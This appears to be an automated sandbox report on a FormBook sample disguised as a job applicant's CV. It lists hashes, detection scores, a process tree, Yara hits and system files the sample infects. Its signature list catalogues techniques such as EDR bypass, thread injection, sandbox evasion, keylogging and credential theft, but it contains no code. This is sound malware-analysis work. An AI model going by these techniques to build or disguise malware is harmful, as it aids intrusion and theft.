Windows Analysis Report
CV_Sales Representative - Job Request PDF.exe

Overview

General Information

Sample name: CV_Sales Representative - Job Request PDF.exe
Analysis ID: 1638116
MD5: f37f105143a4803e3315106d66cd3a99
SHA1: 1be61d66bcf561e7713922b82fc5be40bc9c1599
SHA256: 463a99c4d82f346dd9cb1236df6c6acd9dc5f5df50467848efa167b59c635120
Tags: exeWormm0yvuser-lowmal3
Infos:

Detection

FormBook
Score: 100
Range: 0 - 100
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected FormBook
Binary is likely a compiled AutoIt script file
Creates files inside the volume driver (system volume information)
Drops executable to a common third party application directory
Found direct / indirect Syscall (likely to bypass EDR)
Infects executable files (exe, dll, sys, html)
Joe Sandbox ML detected suspicious sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queries random domain names (often used to prevent blacklisting and sinkholes)
Queues an APC in another process (thread injection)
Switches to a custom stack to bypass stack traces
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Binary contains a suspicious time stamp
Checks if the current process is being debugged
Connects to many different domains
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Creates processes with suspicious names
Detected non-DNS traffic on DNS port
Detected potential crypto function
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Enables debug privileges
Enables driver privileges
Enables security privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
PE file contains an invalid checksum
PE file contains executable resources (Code or Archives)
PE file contains more sections than normal
PE file contains sections with non-standard names
Potential key logger detected (key state polling based)
Queries the volume information (name, serial number etc) of a device
Queries time zone information
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Execution of Suspicious File Type Extension
Sigma detected: Uncommon Svchost Parent Process
Spawns drivers
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • CV_Sales Representative - Job Request PDF.exe (PID: 7620 cmdline: "C:\Users\user\Desktop\CV_Sales Representative - Job Request PDF.exe" MD5: F37F105143A4803E3315106D66CD3A99)
    • svchost.exe (PID: 7728 cmdline: "C:\Users\user\Desktop\CV_Sales Representative - Job Request PDF.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
      • 7EFPjTEjLAB4.exe (PID: 5700 cmdline: "C:\Program Files (x86)\PHsZOyhkvmyMgxGRQbGJyoAgpElJFVCBrczssQOTLQGakVYlxbbKdoeVWDs\3BpMquwWFYm.exe" MD5: 9C98D1A23EFAF1B156A130CEA7D2EE3A)
        • mfpmp.exe (PID: 1208 cmdline: "C:\Windows\SysWOW64\mfpmp.exe" MD5: 9CD65F38A2B4E53E8180395DE4988D6A)
          • 7EFPjTEjLAB4.exe (PID: 6152 cmdline: "C:\Program Files (x86)\PHsZOyhkvmyMgxGRQbGJyoAgpElJFVCBrczssQOTLQGakVYlxbbKdoeVWDs\4385XavJzoz.exe" MD5: 9C98D1A23EFAF1B156A130CEA7D2EE3A)
  • armsvc.exe (PID: 7644 cmdline: "C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe" MD5: 6C099CD2CED3D47DD21428D9C72629D3)
  • alg.exe (PID: 7688 cmdline: C:\Windows\System32\alg.exe MD5: E83065A0C793163DE94A60C4B9F97AB3)
  • AppVStrm.sys (PID: 4 cmdline: MD5: BDA55F89B69757320BC125FF1CB53B26)
  • AppvVemgr.sys (PID: 4 cmdline: MD5: E70EE9B57F8D771E2F4D6E6B535F6757)
  • AppvVfs.sys (PID: 4 cmdline: MD5: 2CBABD729D5E746B6BD8DC1B4B4DB1E1)
  • AppVClient.exe (PID: 7748 cmdline: C:\Windows\system32\AppVClient.exe MD5: 0695A9EB600CEEF4AAEBBF9D1F8A9EEE)
  • FXSSVC.exe (PID: 7852 cmdline: C:\Windows\system32\fxssvc.exe MD5: CE6B7EC1D3FBA7B46B46B2861DEC2B57)
  • elevation_service.exe (PID: 8104 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe" MD5: AC4A4927C418C8C0106D66AD86E7C569)
  • maintenanceservice.exe (PID: 8148 cmdline: "C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe" MD5: 9A0D2898DC68040CDB848643A337FF6D)
  • msdtc.exe (PID: 8184 cmdline: C:\Windows\System32\msdtc.exe MD5: 180632CE73EF2684FB58B10998ADFFF0)
  • PerceptionSimulationService.exe (PID: 7384 cmdline: C:\Windows\system32\PerceptionSimulation\PerceptionSimulationService.exe MD5: 779608D3969C95828FAFA7F0741B505F)
  • perfhost.exe (PID: 1252 cmdline: C:\Windows\SysWow64\perfhost.exe MD5: 22311C7ECABAD76518A2FB7B2FB75ADF)
  • Locator.exe (PID: 7760 cmdline: C:\Windows\system32\locator.exe MD5: 1FC61ACF7E93FD963C2B94565A7535BA)
  • SensorDataService.exe (PID: 5740 cmdline: C:\Windows\System32\SensorDataService.exe MD5: B09433CC1C2BD1CA671C66999DDDBB4D)
  • snmptrap.exe (PID: 7372 cmdline: C:\Windows\System32\snmptrap.exe MD5: 724F76348A106F214F0AF00765C94733)
  • Spectrum.exe (PID: 1464 cmdline: C:\Windows\system32\spectrum.exe MD5: D847760F14BCCB3322C5C299BB0DD5ED)
  • ssh-agent.exe (PID: 8268 cmdline: C:\Windows\System32\OpenSSH\ssh-agent.exe MD5: E22271930FDDC9BF7328C6E0864FE9C2)
  • TieringEngineService.exe (PID: 8312 cmdline: C:\Windows\system32\TieringEngineService.exe MD5: B7A99C06D9D715E843942E73DD9D36D8)
  • AgentService.exe (PID: 8404 cmdline: C:\Windows\system32\AgentService.exe MD5: 70E7E33525470B56100364A204AC5909)
  • vds.exe (PID: 8424 cmdline: C:\Windows\System32\vds.exe MD5: FCEFD36730A69FA9316AFA382E952675)
  • wbengine.exe (PID: 8512 cmdline: "C:\Windows\system32\wbengine.exe" MD5: DD0F83C1A95D0A09A6095E5486D2C64F)
  • cleanup
No configs have been found
Source | Rule | Description | Author | Strings
00000003.00000002.1356343056.0000000003D50000.00000040.10000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
00000003.00000002.1351634880.0000000000400000.00000040.80000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
00000019.00000002.2445449912.00000000033D0000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
00000003.00000002.1356486981.0000000003DA0000.00000040.10000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
00000026.00000002.2456798324.00000000054F0000.00000040.80000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |

System Summary

Source: Process started, Author: Max Altgelt (Nextron Systems): Data: Command: , CommandLine: , CommandLine|base64offset|contains: , Image: C:\Windows\System32\drivers\AppVStrm.sys, NewProcessName: C:\Windows\System32\drivers\AppVStrm.sys, OriginalFileName: C:\Windows\System32\drivers\AppVStrm.sys, ParentCommandLine: , ParentImage: , ParentProcessId: -1, ProcessCommandLine: , ProcessId: 4, ProcessName: AppVStrm.sys
Source: Process started, Author: Florian Roth (Nextron Systems): Data: Command: "C:\Users\user\Desktop\CV_Sales Representative - Job Request PDF.exe", CommandLine: "C:\Users\user\Desktop\CV_Sales Representative - Job Request PDF.exe", CommandLine|base64offset|contains: Ekzb, Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\CV_Sales Representative - Job Request PDF.exe", ParentImage: C:\Users\user\Desktop\CV_Sales Representative - Job Request PDF.exe, ParentProcessId: 7620, ParentProcessName: CV_Sales Representative - Job Request PDF.exe, ProcessCommandLine: "C:\Users\user\Desktop\CV_Sales Representative - Job Request PDF.exe", ProcessId: 7728, ProcessName: svchost.exe
Source: Process started, Author: vburov: Data: Command: "C:\Users\user\Desktop\CV_Sales Representative - Job Request PDF.exe", CommandLine: "C:\Users\user\Desktop\CV_Sales Representative - Job Request PDF.exe", CommandLine|base64offset|contains: Ekzb, Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\CV_Sales Representative - Job Request PDF.exe", ParentImage: C:\Users\user\Desktop\CV_Sales Representative - Job Request PDF.exe, ParentProcessId: 7620, ParentProcessName: CV_Sales Representative - Job Request PDF.exe, ProcessCommandLine: "C:\Users\user\Desktop\CV_Sales Representative - Job Request PDF.exe", ProcessId: 7728, ProcessName: svchost.exe

AV Detection

Source: CV_Sales Representative - Job Request PDF.exe, Avira: detected
Source: C:\Program Files (x86)\AutoIt3\Au3Info_x64.exe, Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Java\jre-1.8\bin\klist.exe, Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\AutoIt3\AutoIt3Help.exe, Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Java\jre-1.8\bin\jjs.exe, Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe, Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javacpl.exe, Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exe, Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Java\jre-1.8\bin\kinit.exe, Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\AutoIt3\Au3Check.exe, Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exe, Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exe, Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exe, Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exe, Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Java\jre-1.8\bin\jabswitch.exe, Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Java\jre-1.8\bin\jp2launcher.exe, Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe, Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exe, Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Common Files\Java\Java Update\jaureg.exe, Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Java\jre-1.8\bin\java-rmi.exe, Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exe, Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Java\jre-1.8\bin\ktab.exe, Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exe, Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Java\jre-1.8\bin\orbd.exe, Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exe, Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exe, Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe, Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Google\GoogleUpdater\135.0.7023.0\updater.exe, Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exe, Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Java\jre-1.8\bin\pack200.exe, Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Java\jre-1.8\bin\keytool.exe, Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\AutoIt3\Au3Info.exe, Avira: detection malicious, Label: W32/Infector.Gen
Source: CV_Sales Representative - Job Request PDF.exe, Virustotal: Detection: 80%
Source: CV_Sales Representative - Job Request PDF.exe, ReversingLabs: Detection: 84%
Source: Yara match, File source: 00000003.00000002.1356343056.0000000003D50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000003.00000002.1351634880.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000019.00000002.2445449912.00000000033D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000003.00000002.1356486981.0000000003DA0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000026.00000002.2456798324.00000000054F0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000019.00000002.2410421915.0000000002E50000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000019.00000002.2419943253.0000000003180000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000017.00000002.2445724285.0000000002FB0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Submitted Sample, Integrated Neural Analysis Model: Matched 100.0% probability
Source: CV_Sales Representative - Job Request PDF.exe, Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
            Source: Binary string: DiagnosticsHub.StandardCollector.Service.pdbGCTL source: CV_Sales Representative - Job Request PDF.exe, 00000000.00000003.1179600004.0000000004220000.00000004.00001000.00020000.00000000.sdmp
            Source: Binary string: ADelRCP_Exec.pdbCC9 source: armsvc.exe, 00000001.00000003.1617904713.0000000002040000.00000004.00001000.00020000.00000000.sdmp
            Source: Binary string: D:\T\BuildResults\bin\Release_x64\AcroBroker.pdb source: armsvc.exe, 00000001.00000003.1468065367.0000000001CC0000.00000004.00001000.00020000.00000000.sdmp
            Source: Binary string: Acrobat_SL.pdb source: armsvc.exe, 00000001.00000003.1457830708.0000000001CC0000.00000004.00001000.00020000.00000000.sdmp
            Source: Binary string: E:\PkgInstaller\base\ntsetup\SrvPack.Main\tools\sfxcab\sfxcab\objfre\i386\sfxcab.pdbU source: armsvc.exe, 00000001.00000003.1831946567.0000000000660000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 00000001.00000003.1822894017.0000000000940000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 00000001.00000003.1821670882.0000000000940000.00000004.00001000.00020000.00000000.sdmp
            Source: Binary string: D:\T\BuildResults\bin\Release_x64\WebInstaller\AcroMiniServicesUpdater.pdbT source: armsvc.exe, 00000001.00000003.1537138014.0000000002040000.00000004.00001000.00020000.00000000.sdmp
            Source: Binary string: C:\workspace\CR-Windows-x64-Client-Builder\x64\Release\CRWindowsClientService.pdbGG source: armsvc.exe, 00000001.00000003.1672499236.0000000002040000.00000004.00001000.00020000.00000000.sdmp
            Source: Binary string: D:\T\BuildResults\bin\Release_x64\AcrobatInfo.pdb))) source: armsvc.exe, 00000001.00000003.1446513434.0000000001CC0000.00000004.00001000.00020000.00000000.sdmp
            Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\jjs_objs\jjs.pdb source: jjs.exe.1.dr
            Source: Binary string: mavinject32.pdb source: armsvc.exe, 00000001.00000003.1872883015.0000000000980000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 00000001.00000003.1869670293.00000000009A0000.00000004.00001000.00020000.00000000.sdmp
            Source: Binary string: msdtcexe.pdbGCTL source: armsvc.exe, 00000001.00000003.1234642578.0000000002030000.00000004.00001000.00020000.00000000.sdmp
            Source: Binary string: 64BitMAPIBroker.pdb source: armsvc.exe, 00000001.00000003.1737896390.0000000002040000.00000004.00001000.00020000.00000000.sdmp
            Source: Binary string: PerceptionSimulationService.pdbGCTL source: armsvc.exe, 00000001.00000003.1251228515.0000000002030000.00000004.00001000.00020000.00000000.sdmp
            Source: Binary string: snmptrap.pdbGCTL source: armsvc.exe, 00000001.00000003.1289023903.0000000002030000.00000004.00001000.00020000.00000000.sdmp
            Source: Binary string: maintenanceservice.pdb source: armsvc.exe, 00000001.00000003.1229505191.0000000002080000.00000004.00001000.00020000.00000000.sdmp
            Source: Binary string: PerfHost.pdbGCTL source: armsvc.exe, 00000001.00000003.1263407309.0000000001C80000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 00000001.00000003.1256719889.0000000002020000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 00000001.00000003.1257623282.0000000002030000.00000004.00001000.00020000.00000000.sdmp
            Source: Binary string: D:\dbs\el\omr\Target\x64\ship\click2run\x-none\InspectorOfficeGadget.pdbY source: armsvc.exe, 00000001.00000003.1856369751.0000000000900000.00000004.00001000.00020000.00000000.sdmp
            Source: Binary string: C:\Work\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: 7EFPjTEjLAB4.exe, 00000017.00000000.1273207364.000000000071F000.00000002.00000001.01000000.00000007.sdmp, 7EFPjTEjLAB4.exe, 00000026.00000002.2410736360.000000000071F000.00000002.00000001.01000000.00000007.sdmp
            Source: Binary string: E:\jenkins\workspace\NGL_WORKFLOW\build\master\win64\Release\Acrobat\project\win\ngl-workflow\x64\Release (Acrobat)\adobe_licensing_wf_helper_acro.pdb source: armsvc.exe, 00000001.00000003.1721195083.00000000019D0000.00000004.00001000.00020000.00000000.sdmp
            Source: Binary string: D:\T\Acrobat\Installers\ADNotificationManager\Viewer Release_x64\ADNotificationManager.pdb source: ADNotificationManager.exe.1.dr
            Source: Binary string: D:\T\BuildResults\bin\Release_x64\WCChromeNativeMessagingHost.pdb source: armsvc.exe, 00000001.00000003.1651749297.0000000002040000.00000004.00001000.00020000.00000000.sdmp
            Source: Binary string: C:\workspace\CR-Windows-x64-Client-Builder\x64\Release\CRWindowsClientService.pdb source: armsvc.exe, 00000001.00000003.1672499236.0000000002040000.00000004.00001000.00020000.00000000.sdmp
            Source: Binary string: C:\work\p4\splinters\Splinters\S\BuildResults\bin\Win32\ReaderRelease\FullTrustNotifier\FullTrustNotifier.pdb source: armsvc.exe, 00000001.00000003.1762652955.0000000001CB0000.00000004.00001000.00020000.00000000.sdmp
            Source: Binary string: PerfHost.pdb source: armsvc.exe, 00000001.00000003.1263407309.0000000001C80000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 00000001.00000003.1256719889.0000000002020000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 00000001.00000003.1257623282.0000000002030000.00000004.00001000.00020000.00000000.sdmp
            Source: Binary string: D:\T\BuildResults\bin\Release\Plug_ins\pi_brokers\32BitMAPIBroker.pdb@@ source: armsvc.exe, 00000001.00000003.1726057074.0000000002040000.00000004.00001000.00020000.00000000.sdmp
            Source: Binary string: MFPMP.pdb source: svchost.exe, 00000003.00000003.1319266499.0000000003424000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.1318579187.000000000341B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.1319168683.000000000341A000.00000004.00000020.00020000.00000000.sdmp, 7EFPjTEjLAB4.exe, 00000017.00000002.2433723996.00000000013EE000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\klist_objs\klist.pdb source: klist.exe.1.dr
            Source: Binary string: D:\T\BuildResults\bin\Release_x64\plug_ins\pi_brokers\MSRMSPIBroker.pdb source: armsvc.exe, 00000001.00000003.1755290977.0000000002040000.00000004.00001000.00020000.00000000.sdmp
            Source: Binary string: maintenanceservice.pdb` source: armsvc.exe, 00000001.00000003.1229505191.0000000002080000.00000004.00001000.00020000.00000000.sdmp
            Source: Binary string: D:\T\Acrobat\Installers\ShowAppPickerForPDF\Release_x64\ShowAppPickerForPDF.pdb$$ source: armsvc.exe, 00000001.00000003.1776380251.0000000000630000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 00000001.00000003.1768773199.0000000000900000.00000004.00001000.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdbUGP source: CV_Sales Representative - Job Request PDF.exe, 00000000.00000003.1172554244.00000000041C0000.00000004.00001000.00020000.00000000.sdmp, CV_Sales Representative - Job Request PDF.exe, 00000000.00000003.1173875272.0000000004BF0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.1249385488.0000000003600000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.1354602493.0000000003B9E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.1251663225.0000000003800000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.1354602493.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, mfpmp.exe, 00000019.00000003.1357310872.00000000034A6000.00000004.00000020.00020000.00000000.sdmp, mfpmp.exe, 00000019.00000002.2448881491.00000000037EE000.00000040.00001000.00020000.00000000.sdmp, mfpmp.exe, 00000019.00000003.1352886352.00000000032D4000.00000004.00000020.00020000.00000000.sdmp, mfpmp.exe, 00000019.00000002.2448881491.0000000003650000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: WmiApSrv.pdb source: armsvc.exe, 00000001.00000003.1364309774.0000000002030000.00000004.00001000.00020000.00000000.sdmp
            Source: Binary string: TieringEngineService.pdb source: armsvc.exe, 00000001.00000003.1318713999.0000000002030000.00000004.00001000.00020000.00000000.sdmp
            Source: Binary string: TieringEngineService.pdbGCTL source: armsvc.exe, 00000001.00000003.1318713999.0000000002030000.00000004.00001000.00020000.00000000.sdmp
            Source: Binary string: D:\T\BuildResults\bin\Release_x64\Eula.pdb source: armsvc.exe, 00000001.00000003.1679115248.0000000002040000.00000004.00001000.00020000.00000000.sdmp
            Source: Binary string: D:\a\_work\e\src\out\Release_x64\notification_helper.exe.pdbOGP source: notification_click_helper.exe.1.dr
            Source: Binary string: ALG.pdb source: CV_Sales Representative - Job Request PDF.exe, 00000000.00000003.1167141010.0000000003F20000.00000004.00001000.00020000.00000000.sdmp
            Source: Binary string: msdtcexe.pdb source: armsvc.exe, 00000001.00000003.1234642578.0000000002030000.00000004.00001000.00020000.00000000.sdmp
            Source: Binary string: DiagnosticsHub.StandardCollector.Service.pdb source: CV_Sales Representative - Job Request PDF.exe, 00000000.00000003.1179600004.0000000004220000.00000004.00001000.00020000.00000000.sdmp
            Source: Binary string: ALG.pdbGCTL source: CV_Sales Representative - Job Request PDF.exe, 00000000.00000003.1167141010.0000000003F20000.00000004.00001000.00020000.00000000.sdmp
            Source: Binary string: PresentationFontCache.pdbHt^t Pt_CorExeMainmscoree.dll source: armsvc.exe, 00000001.00000003.1192730867.00000000019E0000.00000004.00001000.00020000.00000000.sdmp, elevation_service.exe, 0000000B.00000003.2364725219.0000000000830000.00000004.00001000.00020000.00000000.sdmp
            Source: Binary string: D:\T\BuildResults\bin\Release_x64\AcroBroker.pdbTTT source: armsvc.exe, 00000001.00000003.1468065367.0000000001CC0000.00000004.00001000.00020000.00000000.sdmp
            Source: Binary string: locator.pdbGCTL source: armsvc.exe, 00000001.00000003.1271520679.0000000001C80000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 00000001.00000003.1265112613.0000000002030000.00000004.00001000.00020000.00000000.sdmp
            Source: Binary string: D:\T\Acrobat\Installers\ADNotificationManager\Viewer Release_x64\ADNotificationManager.pdb22 source: ADNotificationManager.exe.1.dr
            Source: Binary string: ssh-agent.pdbX source: armsvc.exe, 00000001.00000003.1309434456.0000000002030000.00000004.00001000.00020000.00000000.sdmp
            Source: Binary string: AppVShNotify.pdb source: armsvc.exe, 00000001.00000003.1851615508.0000000000930000.00000004.00001000.00020000.00000000.sdmp
            Source: Binary string: snmptrap.pdb source: armsvc.exe, 00000001.00000003.1289023903.0000000002030000.00000004.00001000.00020000.00000000.sdmp
            Source: Binary string: D:\T\BuildResults\bin\Release\Plug_ins\pi_brokers\32BitMAPIBroker.pdb source: armsvc.exe, 00000001.00000003.1726057074.0000000002040000.00000004.00001000.00020000.00000000.sdmp
            Source: Binary string: D:\T\BuildResults\bin\Release_x64\Eula.pdb888 source: armsvc.exe, 00000001.00000003.1679115248.0000000002040000.00000004.00001000.00020000.00000000.sdmp
            Source: Binary string: AppVShNotify.pdbGCTL source: armsvc.exe, 00000001.00000003.1851615508.0000000000930000.00000004.00001000.00020000.00000000.sdmp

            Spreading

            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe System file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\appvcleaner.exe
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe System file written: C:\Windows\System32\wbem\WmiApSrv.exe
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exe
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe System file written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exe
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe System file written: C:\Program Files\Mozilla Firefox\pingsender.exe
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe System file written: C:\Windows\System32\vds.exe
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exe
            Source: C:\Users\user\Desktop\CV_Sales Representative - Job Request PDF.exe System file written: C:\Windows\System32\alg.exe
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe System file written: C:\Program Files\7-Zip\7zFM.exe
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exe
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe System file written: C:\Windows\System32\snmptrap.exe
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe System file written: C:\Windows\System32\Spectrum.exe
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe System file written: C:\Program Files\Windows Media Player\wmpnetwk.exe
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe System file written: C:\Windows\System32\Locator.exe
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe System file written: C:\Program Files (x86)\AutoIt3\Au3Info_x64.exe
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe System file written: C:\Program Files\Mozilla Firefox\default-browser-agent.exe
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exe
